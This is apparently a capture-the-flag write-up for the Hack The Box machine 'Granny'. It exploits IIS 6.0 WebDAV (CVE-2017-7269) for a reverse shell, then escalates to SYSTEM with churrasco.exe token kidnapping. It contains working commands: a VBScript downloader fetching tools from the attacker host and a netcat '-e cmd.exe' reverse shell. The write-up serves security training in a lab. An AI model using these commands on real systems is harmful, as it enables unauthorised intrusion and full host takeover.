Summary

Granny is an easy Windows box. It can be exploited by properly enumerating the box and finding that it is running Microsoft IIS 6.0 and is vulnerable to a well known exploit: CVE-2017-7269 (WebDav). This is due to a buffer overflow in the ScStoragePathFromUrl function in the WebDAV service. This was abused and resulted in a shell as nt authority\network service. This shell was upgraded through token kidnapping with churrasco.exe to obtain a higher privileged shell.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0

The automated nmap script discovered a very useful exploit with a rating of 10.0. This is the WebDav exploit. First, I browsed to the web page to get some more information:


Exploitation

I intercepted the request and saw that Microsoft IIS 6.0 is indeed running. This exploit was used to exploit Microsoft IIS 6.0 and obtain a reverse shell. The following command was executed:

python2.7 microsoft-iis6.py 10.129.101.72 80 10.10.14.147 9001

This provided a shell:

nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.147] from (UNKNOWN) [10.129.101.72] 1036
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

Privilege Escalation

I mistakenly thought this was a system shell but then quickly realised I simply misread since I couldn’t access the admin’s desktop. I checked systeminfo:

C:\WINDOWS\Temp>systeminfo
systeminfo

Host Name:                 Granny
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-297-2947634-44968
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 1 Hours, 12 Minutes, 25 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 796 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,328 MB
Page File: In Use:         142 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A

This shows Windows Server 2003 and the architecture X86. When googling for this, I came across this very nice github page.. Now, you need to find a way to transfer the files. In these older systems, certutil and powershell are not available so you need to use something else. I always go for vbscript. This is really easy to setup. Copy and paste the following on the machine:

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Now you can run the following command to download files from your host:

cscript /nologo wget.vbs http://10.10.14.147/churrasco.exe churrasco.exe

I also transffered over netcat:

cscript /nologo wget.vbs http://10.10.14.147/nc32.exe nc32.exe

Finally, to make use of this executable you can run the following command which will run as system:

churrasco.exe -d "C:\WINDOWS\Temp\nc32.exe -e cmd.exe 10.10.14.147 4444"

/churrasco/-->Current User: NETWORK SERVICE 
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 680 
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 476 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 688 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 700 
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
The command completed successfully.

If you setup a listener, this will provide you with a system shell.


Conclusion

This was a very simple box but useful nonetheless, I learned about churrasco executable and really like it so will definitely use this for future boxes too since it’s really easy to use. Hope you enjoyed this writeup!